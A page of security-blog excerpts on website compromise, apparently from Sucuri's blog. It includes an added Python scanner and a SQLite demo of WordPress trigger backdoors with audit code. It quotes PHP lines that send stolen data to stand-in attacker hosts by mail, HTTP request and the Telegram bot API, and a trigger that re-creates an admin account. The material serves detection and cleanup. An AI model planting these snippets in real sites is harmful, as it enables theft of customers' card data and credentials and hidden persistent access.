How Do Websites Get Hacked?

As much as the web has grown, surprisingly not a lot has changed in how websites get hacked.

The most important thing you can do in keeping the web – and your own sites and visitors – safe is to understand these unchanging truths and hold them close to heart.

Consider the Scale of Hacked Websites

1.2 billion sites make up today’s World Wide Web. Assuming a 3-second load time, continuous queries, and not a wink of rest, it’d take you over 160 years to just see every site that currently exists.

Continue reading How Do Websites Get Hacked? at Sucuri Blog.

Server Side Data Exfiltration via Telegram API

One of the themes commonly highlighted on this blog includes the many creative methods and techniques attackers employ to steal data from compromised websites. Credit card skimmers, credential and password hijackers, SQL injections, and even malware on the server level can be used for data exfiltration.

What’s more, attackers may be able to accomplish this feat with a few mere lines of code. For example:

Emailing the data:

@mail("email@attacker.com", $_SERVER["SERVER_NAME"], $stolenData);

Writing the data to a local file:

fwrite($fh, $stolenData);

Sending the data in an HTTP request to a server under the attacker's control:

@file_get_contents("http://attacker.com/cgi-bin/optimus.pl?prime=$stolenData");

Writing the data to an image file within the website to avoid raising suspicion:

$hellowp=fopen('./wp-content/uploads/2018/07/[redacted].jpg','a+');
$write=fwrite($hellowp,$username_password,$time);

Harvesting & Exfiltrating Stolen Data via Telegram

One interesting technique our team has come across in recent months leverages the Telegram API to exfiltrate stolen data and send it in a private message to a bot under the attacker's control.
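The snippets above share a small set of tell-tale shapes: mail() fed with $_SERVER["SERVER_NAME"], a remote fetch whose URL embeds a variable, a file handle opened for appending on an image under wp-content/uploads, and a call to the Telegram bot API. The following triage scanner is an added example written for this page (it is not Sucuri's tooling) that runs those four patterns over PHP source and reports matching lines. The sample PHP and the attacker.example hostname are constructed for the demo; the rules are deliberately loose hints for a human reviewer, not proof of compromise.

```python
import re
import sys

# Constructed sample PHP modelled on the exfiltration snippets quoted above.
# Hostnames and paths are placeholders, not indicators from a real incident.
SAMPLE_PHP = r'''
<?php
$stolenData = $_POST['cc_number'];
@mail("email@attacker.example", $_SERVER["SERVER_NAME"], $stolenData);
@file_get_contents("http://attacker.example/cgi-bin/collect.pl?prime=$stolenData");
$hellowp = fopen('./wp-content/uploads/2018/07/image.jpg', 'a+');
$write = fwrite($hellowp, $username_password);
@file_get_contents("https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chat . "&text=" . urlencode($stolenData));
echo "<p>Thanks for your order</p>";
'''

# Each rule is (name, compiled regex). One line can match several rules.
RULES = [
    # mail() whose subject is the compromised host name, a common skimmer habit
    ("mail-with-server-name",
     re.compile(r'@?mail\s*\(.*\$_SERVER\s*\[\s*["\']SERVER_NAME["\']', re.I)),
    # outbound fetch whose URL string interpolates a PHP variable
    ("remote-fetch-with-variable",
     re.compile(r'(file_get_contents|curl_setopt|fopen)\s*\(\s*["\']https?://[^"\']*\$', re.I)),
    # opening an image under the uploads directory for writing
    ("write-to-uploads-image",
     re.compile(r'fopen\s*\(\s*["\'][^"\']*wp-content/uploads/[^"\']*\.(jpe?g|png|gif)["\']', re.I)),
    # any reference to the Telegram bot API endpoint
    ("telegram-bot-api", re.compile(r'api\.telegram\.org/bot', re.I)),
]


def scan_php(source):
    """Return a list of (line_number, rule_name, stripped_line) for every rule hit."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((lineno, name, line.strip()))
    return hits


def scan_file(path):
    """Scan one PHP file on disk; errors='replace' keeps odd encodings from aborting a sweep."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_php(fh.read())


if __name__ == "__main__":
    # With file arguments, scan those; otherwise demonstrate on the constructed sample.
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            for lineno, name, text in scan_file(path):
                print(f"{path}:{lineno}: [{name}] {text}")
    else:
        for lineno, name, text in scan_php(SAMPLE_PHP):
            print(f"sample:{lineno}: [{name}] {text}")
```

Run it without arguments to see the four sample hits, or pass a list of files (for example the output of a find over a web root) to sweep a site. A hit is a starting point for review, not a verdict: legitimate plugins do send mail and make outbound requests, so the value is in lines that match and have no business being in a checkout or session file.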

Continue reading Server Side Data Exfiltration via Telegram API at Sucuri Blog.

Magento 2 PHP Credit Card Skimmer Saves to JPG

Bad actors often leverage creative techniques to conceal malicious behaviour and harvest sensitive information from ecommerce websites.

A recent investigation for a compromised Magento 2 website revealed a malicious injection that was capturing POST request data from site visitors. Located on the checkout page, it was found to encode captured data before saving it to a .JPG file.

Malicious Injection Behavior

The following PHP code was found injected into the file ./vendor/magento/module-customer/Model/Session.php.

Continue reading Magento 2 PHP Credit Card Skimmer Saves to JPG at Sucuri Blog.

Trojan Spyware and BEC Attacks

When it comes to an organization’s security, business email compromise (BEC) attacks are a big problem. One primary reason impacts are so significant is that attacks often use a human victim to authorize a fraudulent transaction to bypass existing security controls that would normally be used to prevent fraud. Another reason is that social engineering lures may be expertly crafted by the attacker after they have been monitoring a victim’s activity for some time, resulting in more effective phishing campaigns with serious security implications.

Continue reading Trojan Spyware and BEC Attacks at Sucuri Blog.

SQL Triggers in Website Backdoors

Over the past year, there’s been an increasing trend of WordPress malware using SQL triggers to hide malicious SQL queries within compromised databases. These queries inject an admin level user into the infected database whenever the trigger condition is met.

What makes this especially problematic for website owners is that most malware cleanup guides focus on the website files and data within specific database tables (for example, wp_users, wp_options, and wp_posts).
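Because a trigger lives in the database schema rather than in any row of wp_users or wp_posts, a cleanup that only inspects those tables never sees it. The following is an added example written for this page (not Sucuri's code) that reproduces the mechanism the post describes in an in-memory SQLite database standing in for WordPress's MySQL: a trigger on an ordinary content table re-creates an administrator whenever a specific phrase is written, and an audit function enumerates all triggers and flags the ones whose body touches user or capability tables. Table layouts are trimmed, and the credentials and trigger phrase are placeholders. On MySQL the equivalent enumeration is SHOW TRIGGERS or a query against information_schema.TRIGGERS.

```python
import re
import sqlite3

# Trimmed WordPress-style schema (constructed for this demo).
SCHEMA = """
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT, user_email TEXT);
CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
CREATE TABLE wp_comments (comment_ID INTEGER PRIMARY KEY, comment_content TEXT);
"""

# A backdoor trigger in the style the post describes: it fires on a normal
# comment insert and re-creates an admin account. All values are placeholders.
MALICIOUS_TRIGGER = """
CREATE TRIGGER after_insert_comment AFTER INSERT ON wp_comments
WHEN NEW.comment_content LIKE '%trigger-phrase-placeholder%'
BEGIN
  INSERT INTO wp_users (user_login, user_pass, user_email)
    VALUES ('wpadmin', 'placeholder-hash', 'placeholder@example.invalid');
  INSERT INTO wp_usermeta (user_id, meta_key, meta_value)
    VALUES (last_insert_rowid(), 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
END;
"""

# A harmless trigger, so the audit has something it should leave alone.
BENIGN_TRIGGER = """
CREATE TRIGGER log_comment AFTER INSERT ON wp_comments
BEGIN
  UPDATE wp_comments SET comment_content = trim(NEW.comment_content)
    WHERE comment_ID = NEW.comment_ID;
END;
"""

# Trigger bodies that mention user or role tables deserve a human look.
SUSPICIOUS = re.compile(r"(wp_users|wp_usermeta|wp_capabilities|administrator)", re.I)


def build_demo_db():
    """Create the in-memory database with both triggers installed."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA + MALICIOUS_TRIGGER + BENIGN_TRIGGER)
    return conn


def list_triggers(conn):
    """Enumerate every trigger with its table and full CREATE text.
    SQLite keeps them in sqlite_master; MySQL exposes them in information_schema.TRIGGERS."""
    rows = conn.execute(
        "SELECT name, tbl_name, sql FROM sqlite_master WHERE type = 'trigger'"
    ).fetchall()
    return [{"name": n, "table": t, "body": s} for n, t, s in rows]


def audit_triggers(conn):
    """Names of triggers whose body touches user/role tables."""
    return [t["name"] for t in list_triggers(conn) if SUSPICIOUS.search(t["body"])]


def drop_trigger(conn, name):
    """Remediation step: remove a trigger by name (quoted as an identifier)."""
    conn.execute('DROP TRIGGER "%s"' % name.replace('"', '""'))


def admin_count(conn):
    """How many rows carry the placeholder backdoor login."""
    return conn.execute(
        "SELECT COUNT(*) FROM wp_users WHERE user_login = 'wpadmin'"
    ).fetchone()[0]


if __name__ == "__main__":
    db = build_demo_db()
    print("admins before:", admin_count(db))
    db.execute("INSERT INTO wp_comments (comment_content) VALUES ('hi trigger-phrase-placeholder')")
    print("admins after trigger fired:", admin_count(db))
    print("flagged triggers:", audit_triggers(db))
    for name in audit_triggers(db):
        drop_trigger(db, name)
    print("flagged after cleanup:", audit_triggers(db))
```

The point of the demo is the order of events: deleting the wpadmin row from wp_users looks like a complete cleanup, yet the next matching comment brings the account straight back. Enumerating and removing the trigger is what actually closes the backdoor, which is why a trigger listing belongs in any database review alongside the usual table checks.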

Continue reading SQL Triggers in Website Backdoors at Sucuri Blog.
